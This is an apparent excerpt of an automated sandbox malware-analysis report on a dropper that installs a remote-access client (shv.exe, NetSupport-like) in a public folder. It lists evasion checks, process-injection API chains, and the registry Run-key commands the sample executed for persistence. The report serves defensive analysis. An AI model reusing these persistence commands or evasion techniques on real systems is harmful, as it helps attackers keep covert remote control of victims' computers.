                                Source: C:\Users\Public\Netstat\shv.exeCode function: 6_2_1115B1D0 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,6_2_1115B1D0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 6_2_11113290 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,6_2_11113290
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 6_2_110CB2B0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,6_2_110CB2B0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 6_2_110CB2B0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,6_2_110CB2B0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 6_2_110254A0 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,6_2_110254A0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 6_2_110258F0 IsIconic,BringWindowToTop,GetCurrentThreadId,6_2_110258F0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 6_2_11023BA0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,6_2_11023BA0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 6_2_11024280 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,6_2_11024280
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 6_2_11112670 IsIconic,GetTickCount,6_2_11112670
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 6_2_111229D0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,6_2_111229D0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 6_2_111229D0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,6_2_111229D0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 6_2_110C0BB0 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,6_2_110C0BB0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 6_2_1115ADD0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,6_2_1115ADD0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 6_2_1115ADD0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,6_2_1115ADD0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 9_2_1115B1D0 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,9_2_1115B1D0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 9_2_11139090 GetCurrentThreadId,IsWindowVisible,IsWindow,IsWindowVisible,IsWindowVisible,GetForegroundWindow,EnableWindow,EnableWindow,EnableWindow,SetForegroundWindow,FindWindowA,IsWindowVisible,IsWindowVisible,IsIconic,GetForegroundWindow,SetForegroundWindow,EnableWindow,GetLastError,GetLastError,GetLastError,GetTickCount,GetTickCount,FreeLibrary,9_2_11139090
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 9_2_11113290 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,9_2_11113290
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 9_2_110CB2B0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,9_2_110CB2B0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 9_2_110CB2B0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,9_2_110CB2B0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 9_2_110254A0 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,9_2_110254A0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 9_2_110258F0 IsIconic,BringWindowToTop,GetCurrentThreadId,9_2_110258F0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 9_2_11023BA0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,9_2_11023BA0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 9_2_11024280 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,9_2_11024280
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 9_2_11112670 IsIconic,GetTickCount,9_2_11112670
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 9_2_111229D0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,9_2_111229D0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 9_2_111229D0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,9_2_111229D0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 9_2_110C0BB0 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,9_2_110C0BB0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 9_2_1115ADD0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,9_2_1115ADD0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 9_2_1115ADD0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,9_2_1115ADD0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 6_2_11143570 GetTickCount,GetModuleFileNameA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,6_2_11143570
                                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                                Malware Analysis System Evasion

                                barindex
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 6_2_6D1C91F06_2_6D1C91F0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 6_2_6D1D4F306_2_6D1D4F30
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 6_2_110B8200 Sleep,ExitProcess,6_2_110B8200
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 9_2_110B8200 Sleep,ExitProcess,9_2_110B8200
                                Source: C:\Users\Public\Netstat\shv.exeWindow / User API: threadDelayed 938Jump to behavior
                                Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\Public\Netstat\TCCTL32.DLLJump to dropped file
                                Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\Public\Netstat\remcmdstub.exeJump to dropped file
                                Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\Public\Netstat\HTCTL32.DLLJump to dropped file
                                Source: C:\Users\Public\Netstat\shv.exeEvaded block: after key decisiongraph_6-80262
                                Source: C:\Users\Public\Netstat\shv.exeEvaded block: after key decisiongraph_6-82146
                                Source: C:\Users\Public\Netstat\shv.exeEvaded block: after key decisiongraph_6-82158
                                Source: C:\Users\Public\Netstat\shv.exeEvaded block: after key decisiongraph_6-85160
                                Source: C:\Users\Public\Netstat\shv.exeEvaded block: after key decisiongraph_6-85559
                                Source: C:\Users\Public\Netstat\shv.exeEvaded block: after key decisiongraph_6-85721
                                Source: C:\Users\Public\Netstat\shv.exeEvaded block: after key decisiongraph_6-85737
                                Source: C:\Users\Public\Netstat\shv.exeEvaded block: after key decision
                                Source: C:\Users\Public\Netstat\shv.exeEvaded block: after key decision
                                Source: C:\Users\Public\Netstat\shv.exeEvaded block: after key decision
                                Source: C:\Users\Public\Netstat\shv.exeEvaded block: after key decision
                                Source: C:\Users\Public\Netstat\shv.exeEvaded block: after key decision
                                Source: C:\Users\Public\Netstat\shv.exeEvaded block: after key decision
                                Source: C:\Users\Public\Netstat\shv.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                                Source: C:\Users\Public\Netstat\shv.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_6-85299
                                Source: C:\Users\Public\Netstat\shv.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_6-80803
                                Source: C:\Users\Public\Netstat\shv.exeAPI coverage: 6.2 %
                                Source: C:\Users\Public\Netstat\shv.exeAPI coverage: 2.6 %
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 6_2_6D1D4F306_2_6D1D4F30
                                Source: C:\Users\Public\Netstat\shv.exe TID: 1012Thread sleep time: -93800s >= -30000sJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Users\Public\Netstat\shv.exeLast function: Thread delayed
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 6_2_6D1D3130 GetSystemTime followed by cmp: cmp eax, 02h and CTI: je 6D1D3226h6_2_6D1D3130
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF70E7940BC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF70E7940BC
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF70E7AB190 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF70E7AB190
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF70E7BFCA0 FindFirstFileExA,0_2_00007FF70E7BFCA0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 6_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,6_2_1102D330
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 6_2_11065890 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,6_2_11065890
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 6_2_1106A0A0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,6_2_1106A0A0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 6_2_111266E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,6_2_111266E0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 6_2_1110AFD0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,6_2_1110AFD0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 9_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,9_2_1102D330
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 9_2_11065890 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,9_2_11065890
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 9_2_1106A0A0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,9_2_1106A0A0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 9_2_111266E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,9_2_111266E0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 9_2_1110AFD0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,9_2_1110AFD0
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF70E7B16A4 VirtualQuery,GetSystemInfo,0_2_00007FF70E7B16A4
                                Source: shv.exe, 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmpBinary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlWinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllc != '\0'dstbufyenc.cla m*
                                Source: HTCTL32.DLL.0.drBinary or memory string: VMware
                                Source: HTCTL32.DLL.0.drBinary or memory string: hbuf->datahttputil.c%5d000000000002004C4F4F50VirtualVMwareVIRTNETGetAdaptersInfoiphlpapi.dllcbMacAddress == MAX_ADAPTER_ADDRESS_LENGTHmacaddr.cpp,%02x%02x%02x%02x%02x%02x* Netbiosnetapi32.dll01234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZwhoa nelly, says Sherman, the Sharkhellooo nurse!kernel32.dllProcessIdToSessionId%s_L%d_%xNOT copied to diskcopied to %sAssert failed - Unhandled Exception (GPF) -
                                Source: TCCTL32.DLL.0.drBinary or memory string: skt%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllGetAdaptersInfoIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlTCREMOTETCBRIDGE%s=%s
                                Source: HTCTL32.DLL.0.drBinary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlWinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllc != '\0'dstbufyenc.cla
                                Source: shv.exe, 00000006.00000002.3994135214.000000000127E000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000006.00000002.3995636739.0000000005F06000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                Source: TCCTL32.DLL.0.drBinary or memory string: VMWare
                                Source: shv.exe, 00000009.00000002.2162978734.0000000001490000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000009.00000003.2162115523.000000000148D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllH
                                Source: shv.exe, 0000000B.00000003.2263461175.00000000015FF000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 0000000D.00000003.2349439155.00000000012AF000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 0000000E.00000003.2430757165.00000000010C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                Source: C:\Users\Public\Netstat\shv.exeAPI call chain: ExitProcess graph end nodegraph_6-80960
                                Source: C:\Users\Public\Netstat\shv.exeAPI call chain: ExitProcess graph end nodegraph_6-80330
                                Source: C:\Users\Public\Netstat\shv.exeAPI call chain: ExitProcess graph end nodegraph_6-85066
                                Source: C:\Users\Public\Netstat\shv.exeAPI call chain: ExitProcess graph end node
                                Source: C:\Users\Public\Netstat\shv.exeAPI call chain: ExitProcess graph end node
                                Source: C:\Users\Public\Netstat\shv.exeAPI call chain: ExitProcess graph end node
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF70E7B76D8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF70E7B76D8
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 6_2_11147750 GetLastError,wsprintfA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,SetLastError,GetKeyState,6_2_11147750
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 6_2_11029590 GetTickCount,LoadLibraryA,GetProcAddress,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,6_2_11029590
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF70E7C0D20 GetProcessHeap,0_2_00007FF70E7C0D20
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF70E7B76D8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF70E7B76D8
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF70E7B3354 SetUnhandledExceptionFilter,0_2_00007FF70E7B3354
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF70E7B2510 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF70E7B2510
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF70E7B3170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF70E7B3170
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 6_2_11093080 _NSMFindClass@12,SetUnhandledExceptionFilter,OpenEventA,FindWindowA,SetForegroundWindow,CreateEventA,CloseHandle,6_2_11093080
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 6_2_110310C0 _NSMClient32@8,SetUnhandledExceptionFilter,6_2_110310C0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 6_2_11161D01 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_11161D01
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 6_2_1116DD89 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_1116DD89
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 6_2_6D1E28E1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_6D1E28E1
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 9_2_11093080 _NSMFindClass@12,SetUnhandledExceptionFilter,OpenEventA,FindWindowA,SetForegroundWindow,CreateEventA,CloseHandle,9_2_11093080
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 9_2_110310C0 _NSMClient32@8,SetUnhandledExceptionFilter,9_2_110310C0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 9_2_11161D01 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_11161D01
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 9_2_1116DD89 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_1116DD89
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 6_2_110F4560 GetTickCount,LogonUserA,GetTickCount,GetLastError,6_2_110F4560
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF70E7AB190 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF70E7AB190
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 6_2_1111FCA0 GetForegroundWindow,GetClassNameA,GetWindowTextA,keybd_event,keybd_event,keybd_event,6_2_1111FCA0
                                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" "Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\Netstat\shv.exe C:\Users\Public\Netstat\shv.exeJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "HKCU\SOFTWARE\Software\Supservice\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "HKCU\SOFTWARE\Software\Supservice\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\Netstat\shv.exe C:\Users\Public\Netstat\shv.exeJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 6_2_1109E190 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetVersionExA,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,FreeLibrary,CreateFileMappingA,GetLastError,LocalFree,LocalFree,LocalFree,GetLastError,MapViewOfFile,LocalFree,LocalFree,LocalFree,GetModuleFileNameA,GetModuleFileNameA,LocalFree,LocalFree,LocalFree,_memset,GetTickCount,GetCurrentProcessId,GetModuleFileNameA,CreateEventA,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,GetCurrentThreadId,CreateThread,ResetEvent,ResetEvent,ResetEvent,ResetEvent,SetEvent,6_2_1109E190
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 6_2_1109E910 GetTokenInformation,GetTokenInformation,GetTokenInformation,AllocateAndInitializeSid,EqualSid,6_2_1109E910
                                Source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.2164185568.0000000011193000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: Shell_TrayWndunhandled plugin data, id=%d
                                Source: shv.exe, shv.exe, 00000009.00000002.2164185568.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.2264560820.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000D.00000002.2351279107.0000000011193000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: Shell_TrayWnd
                                Source: shv.exe, shv.exe, 00000009.00000002.2164185568.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.2264560820.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000D.00000002.2351279107.0000000011193000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: Progman
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF70E79DC70 cpuid 0_2_00007FF70E79DC70
                                Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_00007FF70E7AA2CC
                                Source: C:\Users\Public\Netstat\shv.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,6_2_11173A35
